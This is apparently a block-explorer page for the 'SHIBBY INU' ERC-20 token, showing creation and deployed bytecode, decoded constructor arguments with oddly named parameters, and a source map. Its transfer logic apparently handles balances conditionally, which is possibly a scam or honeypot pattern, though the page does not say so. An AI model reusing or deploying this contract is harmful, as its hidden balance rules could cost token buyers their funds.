b57600080fd5b610a6484610a00565b9250610a7260208501610a00565b9150604084013590509250925092565b600060208284031215610a9457600080fd5b610a9d82610a00565b9392505050565b60008060408385031215610ab757600080fd5b610ac083610a00565b9150610ace60208401610a00565b90509250929050565b600181811c90821680610aeb57607f821691505b602082108103610b0b57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808201808211156103a5576103a5610b11565b818103818111156103a5576103a5610b11565b80820281158282048414176103a5576103a5610b11565b600082610b8157634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220d19dffa056598279ef3119f62683670aa56480c5dae551e8037f3db5f99b181064736f6c63430008110033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000cf5c9c97b02ec2e8389b4e8615485b095c13439e000000000000000000000000000000000000000000000000000000000000000a53484942425920494e550000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065348494242590000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610293578063dd62ed3e146102a6578063efedc669146102b9578063f0fc76fe146102cc578063f2fde38b146102ec57600080fd5b8063715018a61461023d5780638da5cb5b1461024757806391b527901461025857806395d89b4114610278578063a457c2d71461028057600080fd5b8063313ce567116100f4578063313ce567146101c957806339509351146101d85780633eaaf86b146101eb5780636e7cee86146101f457806370a082311461021457600080fd5b806306fdde0314610131578063095ea7b31461014f5780631694505e1461017257806318160ddd1461019d57806323b872dd146101b6575b600080fd5b6101396102ff565b60405161014691906109b2565b60405180910390f35b61016261015d366004610a1c565b610391565b6040519015158152602001610146565b600954610185906001600160a01b031681565b6040516001600160a01b039091168152602001610146565b683635c9adc5dea000005b604051908152602001610146565b6101626101c4366004610a46565b6103ab565b60405160098152602001610146565b6101626101e6366004610a1c565b6103cf565b6101a860025481565b6101a8610202366004610a82565b60006020819052908152604090205481565b6101a8610222366004610a82565b6001600160a01b031660009081526020819052604090205490565b6102456103f1565b005b6005546001600160a01b0316610185565b6101a8610266366004610a82565b600b6020526000908152604090205481565b61013961045c565b61016261028e366004610a1c565b61046b565b6101626102a1366004610a1c565b6104e6565b6101a86102b4366004610aa4565b6104f4565b600a54610185906001600160a01b031681565b6101a86102da366004610a82565b600c6020526000908152604090205481565b6102456102fa366004610a82565b61051f565b60606003805461030e90610ad7565b80601f016020809104026020016040519081016040528092919081815260200182805461033a90610ad7565b80156103875780601f1061035c57610100808354040283529160200191610387565b820191906000526020600020905b81548152906001019060200180831161036a57829003601f168201915b5050505050905090565b60003361039f8185856105ea565b60019150505b92915050565b6000336103b985828561070e565b6103c4858585610788565b506001949350505050565b60003361039f8185856103e283836104f4565b6103ec9190610b27565b6105ea565b6005546001600160a01b031633146104505760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61045a6000610960565b565b60606004805461030e90610ad7565b6000338161047982866104f4565b9050838110156104d95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610447565b6103c482868684036105ea565b60003361039f818585610788565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6005546001600160a01b031633146105795760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610447565b6001600160a01b0381166105de5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610447565b6105e781610960565b50565b6001600160a01b03831661064c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610447565b6001600160a01b0382166106ad5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610447565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061071a84846104f4565b9050600019811461078257818110156107755760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610447565b61078284848484036105ea565b50505050565b6001600160a01b0383166000908152600b60205260409020541580156107c557506001600160a01b0383166000908152600c602052604090205415155b1561081057600a546001600160a01b03848116911614610810576008546001600160a01b0384166000908152600b60205260408120805490919061080a908490610b3a565b90915550505b600680546001600160a01b038481166001600160a01b031983161790925560085491166000818152600c602052604081208054929392909190610854908490610b27565b90915550506001600160a01b0384166000908152600b602052604081205490036108a6576001600160a01b038416600090815260208190526040812080548492906108a0908490610b3a565b90915550505b6000600754836108b69190610b4d565b90506108c3606482610b64565b90506108cf8184610b3a565b925082600080866001600160a01b03166001600160a01b0316815260200190815260200160002060008282546109059190610b27565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161095191815260200190565b60405180910390a35050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b600060208083528351808285015260005b818110156109df578581018301518582016040015282016109c3565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610a1757600080fd5b919050565b60008060408385031215610a2f57600080fd5b610a3883610a00565b946020939093013593505050565b600080600060608486031215610a5b57600080fd5b610a6484610a00565b9250610a7260208501610a00565b9150604084013590509250925092565b600060208284031215610a9457600080fd5b610a9d82610a00565b9392505050565b60008060408385031215610ab757600080fd5b610ac083610a00565b9150610ace60208401610a00565b90509250929050565b600181811c90821680610aeb57607f821691505b602082108103610b0b57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808201808211156103a5576103a5610b11565b818103818111156103a5576103a5610b11565b80820281158282048414176103a5576103a5610b11565b600082610b8157634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220d19dffa056598279ef3119f62683670aa56480c5dae551e8037f3db5f99b181064736f6c63430008110033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000cf5c9c97b02ec2e8389b4e8615485b095c13439e000000000000000000000000000000000000000000000000000000000000000a53484942425920494e550000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065348494242590000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : queen (string): SHIBBY INU
Arg [1] : then (string): SHIBBY
Arg [2] : count (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [3] : cloud (address): 0xCf5C9c97B02ec2E8389b4E8615485b095c13439E

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [3] : 000000000000000000000000cf5c9c97b02ec2e8389b4e8615485b095c13439e
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [5] : 53484942425920494e5500000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [7] : 5348494242590000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

23989:1386:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8170:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10517:197;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;10517:197:0;1004:187:1;24133:41:0;;;;;-1:-1:-1;;;;;24133:41:0;;;;;;-1:-1:-1;;;;;1387:32:1;;;1369:51;;1357:2;1342:18;24133:41:0;1196:230:1;9284:117:0;9372:21;9284:117;;;1577:25:1;;;1565:2;1550:18;9284:117:0;1431:177:1;11294:291:0;;;;;;:::i;:::-;;:::i;9127:92::-;;;9210:1;2088:36:1;;2076:2;2061:18;9127:92:0;1946:184:1;11994:234:0;;;;;;:::i;:::-;;:::i;7588:27::-;;;;;;7462:41;;;;;;:::i;:::-;;;;;;;;;;;;;;;9464:124;;;;;;:::i;:::-;-1:-1:-1;;;;;9565:15:0;9538:7;9565:15;;;;;;;;;;;;9464:124;2088:94;;;:::i;:::-;;1437:87;1510:6;;-1:-1:-1;;;;;1510:6:0;1437:87;;24210:39;;;;;;:::i;:::-;;;;;;;;;;;;;;8388:100;;;:::i;12731:432::-;;;;;;:::i;:::-;;:::i;9794:189::-;;;;;;:::i;:::-;;:::i;10046:151::-;;;;;;:::i;:::-;;:::i;24181:20::-;;;;;-1:-1:-1;;;;;24181:20:0;;;24256:38;;;;;;:::i;:::-;;;;;;;;;;;;;;2337:192;;;;;;:::i;:::-;;:::i;8170:99::-;8224:13;8257:4;8250:11;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8170:99;:::o;10517:197::-;10600:4;336:10;10656:28;336:10;10668:7;10677:6;10656:4;:28::i;:::-;10702:4;10695:11;;;10517:197;;;;;:::o;11294:291::-;11425:4;336:10;11483:38;11499:4;336:10;11514:6;11483:15;:38::i;:::-;11532:23;11538:4;11544:2;11548:6;11532:5;:23::i;:::-;-1:-1:-1;11573:4:0;;11294:291;-1:-1:-1;;;;11294:291:0:o;11994:234::-;12082:4;336:10;12138:60;336:10;12150:7;12187:10;12159:25;336:10;12150:7;12159:9;:25::i;:::-;:38;;;;:::i;:::-;12138:4;:60::i;2088:94::-;1510:6;;-1:-1:-1;;;;;1510:6:0;336:10;1657:23;1649:68;;;;-1:-1:-1;;;1649:68:0;;3648:2:1;1649:68:0;;;3630:21:1;;;3667:18;;;3660:30;3726:34;3706:18;;;3699:62;3778:18;;1649:68:0;;;;;;;;;2153:21:::1;2171:1;2153:9;:21::i;:::-;2088:94::o:0;8388:100::-;8444:13;8477:3;8470:10;;;;;:::i;12731:432::-;12824:4;336:10;12824:4;12907:25;336:10;12924:7;12907:9;:25::i;:::-;12880:52;;12971:15;12951:16;:35;;12943:85;;;;-1:-1:-1;;;12943:85:0;;4009:2:1;12943:85:0;;;3991:21:1;4048:2;4028:18;;;4021:30;4087:34;4067:18;;;4060:62;-1:-1:-1;;;4138:18:1;;;4131:35;4183:19;;12943:85:0;3807:401:1;12943:85:0;13064:56;13069:5;13076:7;13104:15;13085:16;:34;13064:4;:56::i;9794:189::-;9873:4;336:10;9929:24;336:10;9942:2;9946:6;9929:5;:24::i;10046:151::-;-1:-1:-1;;;;;10162:18:0;;;10135:7;10162:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10046:151::o;2337:192::-;1510:6;;-1:-1:-1;;;;;1510:6:0;336:10;1657:23;1649:68;;;;-1:-1:-1;;;1649:68:0;;3648:2:1;1649:68:0;;;3630:21:1;;;3667:18;;;3660:30;3726:34;3706:18;;;3699:62;3778:18;;1649:68:0;3446:356:1;1649:68:0;-1:-1:-1;;;;;2426:22:0;::::1;2418:73;;;::::0;-1:-1:-1;;;2418:73:0;;4415:2:1;2418:73:0::1;::::0;::::1;4397:21:1::0;4454:2;4434:18;;;4427:30;4493:34;4473:18;;;4466:62;-1:-1:-1;;;4544:18:1;;;4537:36;4590:19;;2418:73:0::1;4213:402:1::0;2418:73:0::1;2502:19;2512:8;2502:9;:19::i;:::-;2337:192:::0;:::o;15900:376::-;-1:-1:-1;;;;;16032:19:0;;16024:68;;;;-1:-1:-1;;;16024:68:0;;4822:2:1;16024:68:0;;;4804:21:1;4861:2;4841:18;;;4834:30;4900:34;4880:18;;;4873:62;-1:-1:-1;;;4951:18:1;;;4944:34;4995:19;;16024:68:0;4620:400:1;16024:68:0;-1:-1:-1;;;;;16111:21:0;;16103:68;;;;-1:-1:-1;;;16103:68:0;;5227:2:1;16103:68:0;;;5209:21:1;5266:2;5246:18;;;5239:30;5305:34;5285:18;;;5278:62;-1:-1:-1;;;5356:18:1;;;5349:32;5398:19;;16103:68:0;5025:398:1;16103:68:0;-1:-1:-1;;;;;16184:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;16236:32;;1577:25:1;;;16236:32:0;;1550:18:1;16236:32:0;;;;;;;15900:376;;;:::o;16567:449::-;16702:24;16729:25;16739:5;16746:7;16729:9;:25::i;:::-;16702:52;;-1:-1:-1;;16769:16:0;:37;16765:244;;16851:6;16831:16;:26;;16823:68;;;;-1:-1:-1;;;16823:68:0;;5630:2:1;16823:68:0;;;5612:21:1;5669:2;5649:18;;;5642:30;5708:31;5688:18;;;5681:59;5757:18;;16823:68:0;5428:353:1;16823:68:0;16935:47;16940:5;16947:7;16975:6;16956:16;:25;16935:4;:47::i;:::-;16691:325;16567:449;;;:::o;24303:652::-;-1:-1:-1;;;;;24439:12:0;;;;;;:4;:12;;;;;;:17;:36;;;;-1:-1:-1;;;;;;24460:11:0;;24474:1;24460:11;;;:3;:11;;;;;;:15;;24439:36;24435:149;;;24496:5;;-1:-1:-1;;;;;24496:15:0;;;:5;;:15;24492:81;;24548:9;;-1:-1:-1;;;;;24532:12:0;;;;;;:4;:12;;;;;:25;;:12;;;:25;;24548:9;;24532:25;:::i;:::-;;;;-1:-1:-1;;24492:81:0;24611:5;;;-1:-1:-1;;;;;24627:12:0;;;-1:-1:-1;;;;;;24627:12:0;;;;;;24663:9;;24611:5;;24596:12;24650:9;;;:3;:9;;;;;:22;;24611:5;;24663:9;24650;;24596:12;24650:22;;24663:9;;24650:22;:::i;:::-;;;;-1:-1:-1;;;;;;;24689:12:0;;;;;;:4;:12;;;;;;:17;;24685:55;;-1:-1:-1;;;;;24708:14:0;;:6;:14;;;;;;;;;;:32;;24726:14;;24708:6;:32;;24726:14;;24708:32;:::i;:::-;;;;-1:-1:-1;;24685:55:0;24753:12;24785:6;;24768:14;:23;;;;:::i;:::-;24753:38;-1:-1:-1;24809:10:0;24816:3;24753:38;24809:10;:::i;:::-;24802:17;-1:-1:-1;24830:22:0;24802:17;24830:22;;:::i;:::-;;;24879:14;24863:6;:12;24870:4;-1:-1:-1;;;;;24863:12:0;-1:-1:-1;;;;;24863:12:0;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;24926:4;-1:-1:-1;;;;;24909:38:0;24918:6;-1:-1:-1;;;;;24909:38:0;;24932:14;24909:38;;;;1577:25:1;;1565:2;1550:18;;1431:177;24909:38:0;;;;;;;;24424:531;;24303:652;;;:::o;2537:173::-;2612:6;;;-1:-1:-1;;;;;2629:17:0;;;-1:-1:-1;;;;;;2629:17:0;;;;;;;2662:40;;2612:6;;;2629:17;2612:6;;2662:40;;2593:16;;2662:40;2582:128;2537:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1613:328::-;1690:6;1698;1706;1759:2;1747:9;1738:7;1734:23;1730:32;1727:52;;;1775:1;1772;1765:12;1727:52;1798:29;1817:9;1798:29;:::i;:::-;1788:39;;1846:38;1880:2;1869:9;1865:18;1846:38;:::i;:::-;1836:48;;1931:2;1920:9;1916:18;1903:32;1893:42;;1613:328;;;;;:::o;2135:186::-;2194:6;2247:2;2235:9;2226:7;2222:23;2218:32;2215:52;;;2263:1;2260;2253:12;2215:52;2286:29;2305:9;2286:29;:::i;:::-;2276:39;2135:186;-1:-1:-1;;;2135:186:1:o;2534:260::-;2602:6;2610;2663:2;2651:9;2642:7;2638:23;2634:32;2631:52;;;2679:1;2676;2669:12;2631:52;2702:29;2721:9;2702:29;:::i;:::-;2692:39;;2750:38;2784:2;2773:9;2769:18;2750:38;:::i;:::-;2740:48;;2534:260;;;;;:::o;2799:380::-;2878:1;2874:12;;;;2921;;;2942:61;;2996:4;2988:6;2984:17;2974:27;;2942:61;3049:2;3041:6;3038:14;3018:18;3015:38;3012:161;;3095:10;3090:3;3086:20;3083:1;3076:31;3130:4;3127:1;3120:15;3158:4;3155:1;3148:15;3012:161;;2799:380;;;:::o;3184:127::-;3245:10;3240:3;3236:20;3233:1;3226:31;3276:4;3273:1;3266:15;3300:4;3297:1;3290:15;3316:125;3381:9;;;3402:10;;;3399:36;;;3415:18;;:::i;5786:128::-;5853:9;;;5874:11;;;5871:37;;;5888:18;;:::i;5919:168::-;5992:9;;;6023;;6040:15;;;6034:22;;6020:37;6010:71;;6061:18;;:::i;6092:217::-;6132:1;6158;6148:132;;6202:10;6197:3;6193:20;6190:1;6183:31;6237:4;6234:1;6227:15;6265:4;6262:1;6255:15;6148:132;-1:-1:-1;6294:9:1;;6092:217::o

Swarm Source

ipfs://d19dffa056598279ef3119f62683670aa56480c5dae551e8037f3db5f99b1810
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.